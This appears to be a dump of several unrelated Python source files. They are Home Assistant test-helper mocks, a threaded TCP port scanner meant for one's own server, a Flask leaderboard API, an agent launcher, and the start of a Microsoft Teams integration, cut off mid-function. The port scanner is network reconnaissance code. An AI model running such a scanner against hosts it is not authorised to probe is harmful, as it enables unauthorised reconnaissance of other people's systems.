        if setup_platform is not None:
            # We run this in executor, wrap it in function
            self.setup_platform = lambda *args: setup_platform(*args)

        if async_setup_platform is not None:
            self.async_setup_platform = async_setup_platform

        if async_setup_entry is not None:
            self.async_setup_entry = async_setup_entry

        # Default to a no-op async setup when neither hook was given.
        if setup_platform is None and async_setup_platform is None:
            self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
    """Mock class with some mock defaults."""

    def __init__(
        self,
        hass,
        logger=None,
        domain="test_domain",
        platform_name="test_platform",
        platform=None,
        scan_interval=timedelta(seconds=15),
        entity_namespace=None,
    ):
        """Initialize a mock entity platform."""
        if logger is None:
            logger = logging.getLogger("homeassistant.helpers.entity_platform")

        # Otherwise the constructor will blow up.
        if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
            platform.PARALLEL_UPDATES = 0

        super().__init__(
            hass=hass,
            logger=logger,
            domain=domain,
            platform_name=platform_name,
            platform=platform,
            scan_interval=scan_interval,
            entity_namespace=entity_namespace,
        )
class MockToggleEntity(entity.ToggleEntity):
    """Provide a mock toggle device."""

    def __init__(self, name, state, unique_id=None):
        """Initialize the mock entity."""
        self._name = name or DEVICE_DEFAULT_NAME
        self._state = state
        # Record of (method/property name, kwargs) accesses for assertions.
        self.calls = []

    @property
    def name(self):
        """Return the name of the entity if any."""
        self.calls.append(("name", {}))
        return self._name

    @property
    def state(self):
        """Return the state of the entity if any."""
        self.calls.append(("state", {}))
        return self._state

    @property
    def is_on(self):
        """Return true if entity is on."""
        self.calls.append(("is_on", {}))
        return self._state == STATE_ON

    def turn_on(self, **kwargs):
        """Turn the entity on."""
        self.calls.append(("turn_on", kwargs))
        self._state = STATE_ON

    def turn_off(self, **kwargs):
        """Turn the entity off."""
        self.calls.append(("turn_off", kwargs))
        self._state = STATE_OFF

    def last_call(self, method=None):
        """Return the last recorded call, optionally filtered by method name."""
        if not self.calls:
            return None
        if method is None:
            return self.calls[-1]
        try:
            return next(call for call in reversed(self.calls) if call[0] == method)
        except StopIteration:
            return None
class MockConfigEntry(config_entries.ConfigEntry):
    """Helper for creating config entries that adds some defaults."""

    def __init__(
        self,
        *,
        domain="test",
        data=None,
        version=1,
        entry_id=None,
        source=config_entries.SOURCE_USER,
        title="Mock Title",
        state=None,
        options=None,
        system_options=None,
        connection_class=config_entries.CONN_CLASS_UNKNOWN,
        unique_id=None,
    ):
        """Initialize a mock config entry.

        `options` and `system_options` default to fresh empty dicts; the
        previous `options={}` defaults were mutable default arguments
        shared (and mutable) across every MockConfigEntry instance.
        """
        kwargs = {
            "entry_id": entry_id or uuid.uuid4().hex,
            "domain": domain,
            "data": data or {},
            "system_options": {} if system_options is None else system_options,
            "options": {} if options is None else options,
            "version": version,
            "title": title,
            "connection_class": connection_class,
            "unique_id": unique_id,
        }
        # Only forward source/state when given so the base class defaults
        # still apply.
        if source is not None:
            kwargs["source"] = source
        if state is not None:
            kwargs["state"] = state
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        hass.config_entries._entries.append(self)

    def add_to_manager(self, manager):
        """Test helper to add entry to entry manager."""
        manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
    """Patch load_yaml with a dictionary of yaml files."""
    # match using endswith, start search with longest string
    # NOTE(review): key=len sorts shortest-first, so the *shortest* suffix is
    # actually tried first — confirm whether reverse=True was intended here.
    matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []

    def mock_open_f(fname, **_):
        """Mock open() in the yaml module, used by load_yaml."""
        # Return the mocked file on full match
        if isinstance(fname, pathlib.Path):
            fname = str(fname)
        if fname in files_dict:
            _LOGGER.debug("patch_yaml_files match %s", fname)
            res = StringIO(files_dict[fname])
            # Give the stream a name attribute like a real file object.
            setattr(res, "name", fname)
            return res

        # Match using endswith
        for ends in matchlist:
            if fname.endswith(ends):
                _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
                res = StringIO(files_dict[ends])
                setattr(res, "name", fname)
                return res

        # Fallback for hass.components (i.e. services.yaml)
        if "homeassistant/components" in fname:
            _LOGGER.debug("patch_yaml_files using real file: %s", fname)
            return open(fname, encoding="utf-8")

        # Not found
        raise FileNotFoundError(f"File not found: {fname}")

    return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
    """Return an awaitable that resolves to *return_value* or raises *exception*."""
    future = asyncio.Future()
    if exception is None:
        future.set_result(return_value)
    else:
        future.set_exception(exception)
    return future
@contextmanager
def assert_setup_component(count, domain=None):
    """Collect valid configuration from setup_component.

    - count: The amount of valid platforms that should be setup
    - domain: The domain to count is optional. It can be automatically
      determined most of the time

    Use as a context manager around setup.setup_component
        with assert_setup_component(0) as result_config:
            setup_component(hass, domain, start_config)
            # using result_config is optional
    """
    config = {}

    async def mock_psc(hass, config_input, integration):
        """Mock the prepare_setup_component to capture config."""
        domain_input = integration.domain
        res = await async_process_component_config(hass, config_input, integration)
        # Record the validated config (or None on validation failure).
        config[domain_input] = None if res is None else res.get(domain_input)
        _LOGGER.debug(
            "Configuration for %s, Validated: %s, Original %s",
            domain_input,
            config[domain_input],
            config_input.get(domain_input),
        )
        return res

    assert isinstance(config, dict)
    with patch("homeassistant.config.async_process_component_config", mock_psc):
        yield config

    # After the with-block: infer the domain when not given, then verify
    # the number of validated platforms matches the expectation.
    if domain is None:
        assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
            list(config.keys())
        )
        domain = list(config.keys())[0]

    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert (
        res_len == count
    ), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
    """Initialize the recorder with an in-memory database."""
    config = dict(add_config) if add_config else {}
    config[recorder.CONF_DB_URL] = "sqlite://"  # In memory DB

    # Skip schema migration; the fresh in-memory DB is created at the
    # latest schema already.
    with patch("homeassistant.components.recorder.migration.migrate_schema"):
        assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
    """Initialize the recorder asynchronously with an in-memory database."""
    config = dict(add_config) if add_config else {}
    config[recorder.CONF_DB_URL] = "sqlite://"

    # Skip schema migration; the fresh in-memory DB is created at the
    # latest schema already.
    with patch("homeassistant.components.recorder.migration.migrate_schema"):
        assert await async_setup_component(
            hass, recorder.DOMAIN, {recorder.DOMAIN: config}
        )
        assert recorder.DOMAIN in hass.config.components
    _LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
    """Mock the DATA_RESTORE_CACHE with the given states."""
    key = restore_state.DATA_RESTORE_STATE_TASK
    data = restore_state.RestoreStateData(hass)
    now = date_util.utcnow()

    last_states = {}
    for state in states:
        # Round-trip the attributes through JSON so the stored state matches
        # what a real restore from disk would produce.
        restored_state = state.as_dict()
        restored_state["attributes"] = json.loads(
            json.dumps(restored_state["attributes"], cls=JSONEncoder)
        )
        last_states[state.entity_id] = restore_state.StoredState(
            State.from_dict(restored_state), now
        )
    data.last_states = last_states
    _LOGGER.debug("Restore cache: %s", data.last_states)
    assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"

    hass.data[key] = data
class MockEntity(entity.Entity):
    """Mock Entity class.

    Any entity property can be overridden by passing it as a keyword
    argument; unset properties fall back to the base Entity defaults.
    """

    def __init__(self, **values):
        """Initialize an entity."""
        self._values = values

        if "entity_id" in values:
            self.entity_id = values["entity_id"]

    @property
    def name(self):
        """Return the name of the entity."""
        return self._handle("name")

    @property
    def should_poll(self):
        """Return the state of the polling."""
        return self._handle("should_poll")

    @property
    def unique_id(self):
        """Return the unique ID of the entity."""
        return self._handle("unique_id")

    @property
    def state(self):
        """Return the state of the entity."""
        return self._handle("state")

    @property
    def available(self):
        """Return True if entity is available."""
        return self._handle("available")

    @property
    def device_info(self):
        """Info how it links to a device."""
        return self._handle("device_info")

    @property
    def device_class(self):
        """Info how device should be classified."""
        return self._handle("device_class")

    @property
    def unit_of_measurement(self):
        """Info on the units the entity state is in."""
        return self._handle("unit_of_measurement")

    @property
    def capability_attributes(self):
        """Info about capabilities."""
        return self._handle("capability_attributes")

    @property
    def supported_features(self):
        """Info about supported features."""
        return self._handle("supported_features")

    @property
    def entity_registry_enabled_default(self):
        """Return if the entity should be enabled when first added to the entity registry."""
        return self._handle("entity_registry_enabled_default")

    def _handle(self, attr):
        """Return the overridden value for *attr* or the base-class default."""
        if attr in self._values:
            return self._values[attr]
        # Fall back to the property defined on the parent Entity class.
        return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
    """Mock storage.
    Data is a dict {'key': {'version': version, 'data': data}}
    Written data will be converted to JSON to ensure JSON parsing works.
    """
    if data is None:
        data = {}
    # Keep a reference to the real loader so migration logic still runs.
    orig_load = storage.Store._async_load
    async def mock_async_load(store):
        """Mock version of load."""
        if store._data is None:
            # No data to load
            if store.key not in data:
                return None
            mock_data = data.get(store.key)
            if "data" not in mock_data or "version" not in mock_data:
                _LOGGER.error('Mock data needs "version" and "data"')
                raise ValueError('Mock data needs "version" and "data"')
            store._data = mock_data
        # Route through original load so that we trigger migration
        loaded = await orig_load(store)
        _LOGGER.info("Loading data for %s: %s", store.key, loaded)
        return loaded
    def mock_write_data(store, path, data_to_write):
        """Mock version of write data."""
        _LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
        # To ensure that the data can be serialized
        data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
    async def mock_remove(store):
        """Remove data."""
        data.pop(store.key, None)
    # Patch load/write/remove so all Store traffic goes through `data`.
    with patch(
        "homeassistant.helpers.storage.Store._async_load",
        side_effect=mock_async_load,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store._write_data",
        side_effect=mock_write_data,
        autospec=True,
    ), patch(
        "homeassistant.helpers.storage.Store.async_remove",
        side_effect=mock_remove,
        autospec=True,
    ):
        yield data
async def flush_store(store):
    """Make sure all delayed writes of a store are written."""
    # Nothing was ever loaded/written; there is nothing pending to flush.
    if store._data is None:
        return
    # Cancel the scheduled delayed/final-write listeners, then force the
    # pending data to be written immediately.
    store._async_cleanup_final_write_listener()
    store._async_cleanup_delay_listener()
    await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
    """Return the system health info reported by *domain*'s registered callback."""
    registration = hass.data["system_health"][domain]
    return await registration.info_callback(hass)
def mock_integration(hass, module):
    """Mock an integration.

    Registers *module* (typically a MockModule) in hass's integration and
    component caches under module.DOMAIN and returns the Integration object.
    """
    integration = loader.Integration(
        hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
    )
    def mock_import_platform(platform_name):
        # Platforms must be registered explicitly (see mock_platform);
        # importing an unregistered one should fail loudly.
        raise ImportError(
            f"Mocked unable to import platform '{platform_name}'",
            name=f"{integration.pkg_path}.{platform_name}",
        )
    integration._import_platform = mock_import_platform
    _LOGGER.info("Adding mock integration: %s", module.DOMAIN)
    hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
    hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
    return integration
def mock_entity_platform(hass, platform_path, module):
    """Register *module* as an entity platform.

    ``platform_path`` is given as ``<entity domain>.<integration>`` (e.g.
    ``light.hue``) and is registered under the inverted path ``hue.light``.
    """
    entity_domain, integration_name = platform_path.split(".")
    mock_platform(hass, f"{integration_name}.{entity_domain}", module)
def mock_platform(hass, platform_path, module=None):
    """Mock a platform.
    platform_path is in form hue.config_flow.

    Ensures the owning integration exists (creating a MockModule-backed one
    if needed) and registers *module* (or a Mock) as the platform module.
    """
    # NOTE(review): platform_name is unpacked but unused; only the domain
    # part drives the integration lookup.
    domain, platform_name = platform_path.split(".")
    integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
    module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
    if domain not in integration_cache:
        mock_integration(hass, MockModule(domain))
    _LOGGER.info("Adding mock integration platform: %s", platform_path)
    module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
    """Create a helper that captures events.

    Returns a list that is appended to (in event-loop context) every time
    *event_name* fires on the bus.
    """
    events = []
    @ha.callback
    def capture_events(event):
        events.append(event)
    hass.bus.async_listen(event_name, capture_events)
    return events
@ha.callback
def async_mock_signal(hass, signal):
    """Catch all dispatches to a signal.

    Returns a list that accumulates the positional args of every dispatch
    sent to *signal*.
    """
    calls = []
    @ha.callback
    def mock_signal_handler(*args):
        """Mock service call."""
        calls.append(args)
    hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
    return calls
class hashdict(dict):
    """
    hashable dict implementation, suitable for use as a key into other dicts.
    >>> h1 = hashdict({"apples": 1, "bananas":2})
    >>> h2 = hashdict({"bananas": 3, "mangoes": 5})
    >>> h1+h2
    hashdict(apples=1, bananas=3, mangoes=5)
    >>> d1 = {}
    >>> d1[h1] = "salad"
    >>> d1[h1]
    'salad'
    >>> d1[h2]
    Traceback (most recent call last):
    ...
    KeyError: hashdict(bananas=3, mangoes=5)
    based on answers from
    http://stackoverflow.com/questions/1151658/python-hashable-dicts
    """
    def __key(self):
        # Order-independent identity: equality/hashing use sorted items.
        return tuple(sorted(self.items()))
    def __repr__(self):  # noqa: D105 no docstring
        # Bug fix: previously only "k=v, ..." was emitted, which did not
        # match this class's own doctests, which expect "hashdict(k=v, ...)"
        # (and which is also what KeyError shows for a missing key).
        pairs = ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
        return f"{self.__class__.__name__}({pairs})"
    def __hash__(self):  # noqa: D105 no docstring
        return hash(self.__key())
    def __setitem__(self, key, value):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def __delitem__(self, key):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def clear(self):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def pop(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def popitem(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def setdefault(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    def update(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")
    # update is not ok because it mutates the object
    # __add__ is ok because it creates a new object
    # while the new object is under construction, it's ok to mutate it
    def __add__(self, right):  # noqa: D105 no docstring
        result = hashdict(self)
        dict.update(result, right)
        return result
def assert_lists_same(a, b):
    """Assert two lists of dicts hold the same items, ignoring order."""
    counted_a = collections.Counter(hashdict(item) for item in a)
    counted_b = collections.Counter(hashdict(item) for item in b)
    assert counted_a == counted_b
|
app_thread.py | # Local/Own Server Port Scanner
# Thread but quick
import threading
import socket
import sys
from queue import Queue # first in first out
import os
from pathlib import Path
import json
# Resolve relative paths (the JSON config below) against this script's folder.
os.chdir(Path(__file__).parent )
with open("./portscanner.json", mode="r", encoding="UTF-8") as file:
    content = file.read()
# Expected config keys: target_ip (str), port_start (int), port_end (int).
app_json = json.loads(content)
target_ip = app_json["target_ip"]
port_start = app_json["port_start"]
port_end = app_json["port_end"]
# Shared, module-level scan state used by the worker threads below.
num_threads = 10
thread_list = []
open_ports = []
queue = Queue()  # work queue of ports still to scan
def scan_port(port):
    """Return True if TCP *port* is open on the module-level target_ip.

    connect_ex returns 0 on a successful connect instead of raising; the
    context manager guarantees the socket is closed (the original leaked
    one socket per scanned port).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as net_socket:  # TCP
        # NOTE(review): no explicit timeout is set, so a filtered port can
        # block for the OS default connect timeout -- confirm acceptable.
        return net_socket.connect_ex((target_ip, port)) == 0
def worker():
    """Drain ports from the shared queue and record the open ones.

    Bug fix: the original checked queue.empty() and then called queue.get();
    with several workers a port could be consumed between those two calls,
    leaving this thread blocked forever on an empty queue. get_nowait() plus
    the Empty exception makes the drain race-free.
    """
    from queue import Empty  # local import: module-level `queue` is the Queue instance
    while True:
        try:
            port = queue.get_nowait()
        except Empty:
            return
        if scan_port(port):
            # print(f"Port {port} is open")
            open_ports.append(port)
def fill_queue(port_list):
    """Load every port from *port_list* into the shared work queue."""
    for candidate in port_list:
        queue.put(candidate)
if __name__ == "__main__":
    # Create a list of Ports
    # NOTE(review): range() excludes its stop value, so port_end itself is
    # never scanned -- confirm whether an inclusive upper bound was intended.
    port_list = range(port_start, port_end)
    # Fill the Queue with port list, to avoid scanning the same port via threads
    fill_queue(port_list)
    # Create and start the threads
    for t in range(num_threads):
        thread = threading.Thread(target=worker)
        thread_list.append(thread)
    for thread in thread_list:
        thread.start()
    # Wait for every worker to finish draining the queue before reporting.
    for thread in thread_list:
        thread.join()
    print("Open Ports are:", open_ports)
|
start_n.py | import threading
from client.agent import Agent
from time import sleep
if __name__ == '__main__':
    # Number of agents to launch (presumably one per queen for an
    # N-queens-style multi-agent run -- TODO confirm against client.agent).
    N = 12
    for i in range(N):
        a = Agent(figure='queen')
        # Each agent runs in its own thread; no join(), so the process stays
        # alive until every agent's run() returns.
        thread = threading.Thread(target=a.run)
        thread.start()
        # Stagger agent start-up slightly.
        sleep(0.3)
|
app.py | from flask import Flask, jsonify, request, redirect, Response, send_file
from database import SessionLocal, engine
from getData import *
from database import *
from getDB import *
import models
from security import *
from werkzeug.utils import secure_filename
from flask_cors import CORS, cross_origin
import csv
import threading
app = Flask(__name__)
# Single module-wide SQLAlchemy session shared by every request handler.
# NOTE(review): sharing one Session across Flask worker threads is not
# thread-safe -- confirm the deployment is effectively single-threaded.
db = SessionLocal()
# Create all tables declared on the models' Base (no-op if they exist).
models.Base.metadata.create_all(bind=engine)
def readCSVFile(filename):
    """Kick off fillDB.py on *filename* as a detached background process.

    Security fix: the original used os.system("python fillDB.py " + filename
    + " &"), which interpolates the path into a shell command (shell-injection
    risk and breakage on paths containing spaces). Popen with an argument
    list keeps the fire-and-forget behaviour without involving a shell.
    """
    import subprocess  # local import keeps the module's import surface unchanged
    print("here")
    subprocess.Popen(["python", "fillDB.py", filename])
@app.route('/')
@cross_origin()
def index():
    """Serve the full leaderboard as JSON."""
    leaderboard = getJsonFromDB()
    return jsonify(leaderboard)
@app.route('/add', methods=['POST'])
def add():
    """Add a single participant to the leaderboard (token-protected).

    Expects JSON with name, email and qwikLabURL; scrapes the profile for
    scores and inserts a Leaderboard row.
    """
    # get header
    header = request.headers.get('Authorization')
    if header is None:
        return jsonify({"error": "No authorization header"}), 401
    # pass token to verify (`is None` instead of `== None`)
    if verify_token(header) is None:
        return jsonify({"error": "Invalid token"}), 401
    # get data from the name email and qwiklabs from the request
    name = request.json['name']
    email = request.json['email']
    qwiklabs = request.json['qwikLabURL']
    profile_image = profileImage(qwiklabs)
    score = getScoreRefresh(qwiklabs)
    user = models.Leaderboard(
        name=name,
        email=email,
        qwiklab_url=qwiklabs,
        total_score=score["total_score"],
        track1_score=score["track1_score"],
        track2_score=score["track2_score"],
        profile_image=profile_image,
    )
    try:
        db.add(user)
        db.commit()
        return jsonify({"success": "success"})
    except Exception:
        # Narrowed from a bare `except:`; roll back so the shared session is
        # not left in a failed state for subsequent requests.
        db.rollback()
        return jsonify({"error": "Already exists"})
# upload csv file and put data in the database
@app.route('/upload', methods=['POST'])
def upload():
    """Accept a CSV upload and trigger a background import (token-protected).

    NOTE(review): the loop below returns on the very first row, so the row
    fields read here are unused and the import thread is started once with
    the whole file path (parsing presumably happens in fillDB.py -- confirm).
    An empty CSV falls out of the loop with no return value (HTTP 500).
    """
    # get header
    header = request.headers.get('Authorization')
    if header is None:
        return jsonify({"error": "No authorization header"}), 401
    # pass token to verify
    if verify_token(header) == None:
        return jsonify({"error": "Invalid token"}), 401
    # get name email and qwiklabs from the file uploaded
    file = request.files['file']
    # saving the file
    filename = "/app/database/" + secure_filename(file.filename) + "code"
    file.save(filename)
    with open(filename, 'r') as csvfile:
        # read the file
        reader = csv.DictReader(csvfile)
        for row in reader:
            try:
                # These reads act as a header sanity-check: a missing column
                # raises KeyError and yields the error response below.
                name = row['Student Name']
                email = row['Student Email']
                qwiklabs = row['Qwiklabs Profile URL']
                # call the function in a different thread
                thread = threading.Thread(target=readCSVFile, args=(filename,))
                thread.start()
                return jsonify({"success": "success"})
            except:
                return jsonify({"error": "Invalid csv file"})
@app.route('/register', methods=['POST'])
def register():
    """Create an admin user with a hashed password.

    NOTE(review): unlike /add and /upload this endpoint requires no
    Authorization header -- confirm that is intentional.
    """
    username = request.json['username']
    password = request.json['password']
    user = models.UserModel(username=username, password=hashMe(password))
    try:
        db.add(user)
        db.commit()
        return jsonify({"success": "success"})
    except Exception:
        # Narrowed from a bare `except:`; rollback keeps the shared session
        # usable after a failed (duplicate) insert.
        db.rollback()
        return jsonify({"error": "Already exists"})
@app.route('/login', methods=['POST'])
def login():
    """Authenticate an admin user and hand back a bearer token."""
    credentials = request.json
    username = credentials['username']
    password = credentials['password']
    user = db.query(models.UserModel).filter_by(username=username).first()
    if not user:
        return jsonify({"message": "user does not exist"})
    if not verify_passwd(password, user.password):
        # Wrong password: report invalid credentials (note: body only, no
        # explicit 401 status is actually sent).
        return jsonify({"message": "Invalid credentials"})
    access_token = create_access_token(user.username)
    return jsonify({"access_token": access_token, "type": "bearer"})
@app.route('/update', methods=['POST'])
def update():
    """Re-scrape and persist the scores for one participant by email."""
    email = request.json['email']
    # find email in database
    user = db.query(models.Leaderboard).filter_by(email=email).first()
    if user is None:
        # Bug fix: an unknown email previously crashed with AttributeError
        # on user.qwiklab_url (HTTP 500); report it explicitly instead.
        return jsonify({"error": "user not found"}), 404
    score = getScoreRefresh(user.qwiklab_url)
    user.total_score = score["total_score"]
    user.track1_score = score["track1_score"]
    user.track2_score = score["track2_score"]
    db.commit()
    return jsonify({"success": "success"})
@app.route('/image')
def image():
    """Serve the bundled placeholder avatar image."""
    placeholder = 'default.png'
    return send_file(placeholder, mimetype='image/png')
@app.route('/logs')
def sendScrappingErrorLog():
    """Return the scraper's log file (token-protected)."""
    auth_header = request.headers.get('Authorization')
    if auth_header is None:
        return jsonify({"error": "No authorization header"})
    if verify_token(auth_header) is None:
        return jsonify({"error": "Invalid Token"})
    return send_file('database/scraping_log.txt', 'text/plain')
@app.route("/getScore")
def giveScore():
    """Scrape and return the score breakdown for an arbitrary profile URL."""
    profile_url = request.json["url"]
    return jsonify(getScoreRefresh(profile_url))
@app.route("/app")
def getApp():
    """Serve the Android APK and bump the persisted download counter."""
    counter_path = "database/app.txt"
    if os.path.isfile(counter_path):
        # Read the current count, then write it back incremented.
        with open(counter_path, "r") as counter_file:
            downloads = int(counter_file.read()) + 1
        with open(counter_path, "w") as counter_file:
            counter_file.write(str(downloads))
    else:
        # First download: create the counter file.
        with open(counter_path, "w") as counter_file:
            counter_file.write("1")
    return send_file("leaderboardv2.apk", "application/vnd.android.package-archive")
@app.route("/app/number")
def getAppNumber():
    """Report how many times the APK endpoint has been hit."""
    counter_path = "database/app.txt"
    if not os.path.isfile(counter_path):
        # No downloads recorded yet.
        return jsonify({"number": 0})
    with open(counter_path, "r") as counter_file:
        return jsonify({"number": counter_file.read()})
@app.route("/app/activate")
def activateApp():
    """Record one app activation in the persisted counter and confirm it."""
    counter_path = "database/app_active.txt"
    if os.path.isfile(counter_path):
        # Read the current count, then write it back incremented.
        with open(counter_path, "r") as counter_file:
            activations = int(counter_file.read()) + 1
        with open(counter_path, "w") as counter_file:
            counter_file.write(str(activations))
    else:
        # First activation: create the counter file.
        with open(counter_path, "w") as counter_file:
            counter_file.write("1")
    return jsonify({"message": "activated"})
@app.route("/app/active")
def getActiveApp():
    """Report the recorded number of app activations."""
    counter_path = "database/app_active.txt"
    if not os.path.isfile(counter_path):
        return jsonify({"number": 0})
    with open(counter_path, "r") as counter_file:
        return jsonify({"number": counter_file.read().strip()})
@app.route("/updateURL")
def updateURL():
    """Change a participant's profile URL (token-protected).

    NOTE(review): this route reads request.json but is registered for GET
    only; most clients cannot send a JSON body on GET -- confirm whether
    methods=['POST'] was intended.
    """
    # Security
    header = request.headers.get('Authorization')
    if header is None:
        return jsonify({"error": "No authorization header"})
    # pass token to verify (`is None` instead of `== None`)
    if verify_token(header) is None:
        return jsonify({"error": "Invalid Token"})
    url = request.json["url"]
    email = request.json["email"]
    user = db.query(models.Leaderboard).filter_by(email=email).first()
    if user is None:
        # Bug fix: an unknown email previously crashed with AttributeError
        # on user.qwiklab_url (HTTP 500); report it explicitly instead.
        return jsonify({"error": "user not found"}), 404
    user.qwiklab_url = url
    db.commit()
    return jsonify({"success": "success"})
if __name__== "__main__":
    # Serve directly over HTTPS on the standard TLS port using the bundled
    # certificate/key pair.
    app.run(
        host='0.0.0.0', port="443",
        ssl_context=('origin.pem', 'key.pem'),  # comment this line to not run the server in https
    )
|
MicrosoftTeams.py | import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
# Integration instance parameters as configured by the user.
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
# "insecure" param inverts into certificate verification for all requests.
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
# Matches plain http(s) URLs for markdown linkification.
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
# Matches a GUID, optionally wrapped in braces (entitlement identifiers).
ENTITLEMENT_REGEX: str = \
    r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
# Matches "@name;" mentions at the start of or within a message.
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
# Logical message type -> wire value sent alongside notifications.
MESSAGE_TYPES: dict = {
    'mirror_entry': 'mirrorEntry',
    'incident_opened': 'incidentOpened',
    'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
    """
    Return the number of seconds for given date. If no date, return current.
    :param d: timestamp datetime object
    :return: timestamp in epoch
    """
    when = d if d else datetime.utcnow()
    epoch_start = datetime.utcfromtimestamp(0)
    return int((when - epoch_start).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
    """
    Extract a human-readable error message from a failed Microsoft API response.
    :param resp_err: response with error
    :param api: API to query (graph/bot)
    :return: string of error
    """
    try:
        payload: dict = resp_err.json()
        if api == 'graph':
            error_info: dict = payload.get('error', {})
            message: str = f"{error_info.get('code', '')}: {error_info.get('message', '')}"
            if message:
                return message
        elif api == 'bot':
            description: str = payload.get('error_description', '')
            if description:
                return description
        # Body parsed but carried no recognizable error field; fall back to raw text.
        raise ValueError()
    except ValueError:
        return resp_err.text
def translate_severity(severity: str) -> int:
    """
    Translates Demisto text severity to int severity
    :param severity: Demisto text severity
    :return: Demisto integer severity
    """
    mapping = {
        'Unknown': 0,
        'Low': 1,
        'Medium': 2,
        'High': 3,
        'Critical': 4,
    }
    # Anything unrecognized maps to Unknown (0).
    return mapping.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
    """
    Creates incidents according to a provided JSON object
    :param demisto_user: The demisto user associated with the request (if exists)
    :param incidents: The incidents JSON
    :return: The creation result
    """
    # Attribute the creation to the requesting user when one is known.
    if not demisto_user:
        return demisto.createIncidents(incidents)
    return demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
def process_incident_create_message(demisto_user: dict, message: str) -> str:
    """
    Processes an incident creation message
    :param demisto_user: The Demisto user associated with the message (if exists)
    :param message: The creation message
    :return: Creation result
    """
    # Lookbehind patterns: everything after "json=", "name=" or "type=".
    json_pattern: str = r'(?<=json=).*'
    name_pattern: str = r'(?<=name=).*'
    type_pattern: str = r'(?<=type=).*'
    json_match: Optional[Match[str]] = re.search(json_pattern, message)
    # NOTE(review): created_incident is only *annotated* here, not assigned;
    # on the error paths below it stays unbound, so the `if created_incident`
    # check at the end would raise NameError -- confirm those paths.
    created_incident: Union[dict, list]
    data: str = str()
    if json_match:
        if re.search(name_pattern, message) or re.search(type_pattern, message):
            data = 'No other properties other than json should be specified.'
        else:
            incidents_json: str = json_match.group()
            # Teams clients auto-replace quotes with smart quotes; undo that.
            incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
            if not isinstance(incidents, list):
                incidents = [incidents]
            created_incident = create_incidents(demisto_user, incidents)
            if not created_incident:
                data = 'Failed creating incidents.'
    else:
        name_match: Optional[Match[str]] = re.search(name_pattern, message)
        if not name_match:
            data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
        else:
            # Strip a trailing "type=..." portion captured by the greedy match.
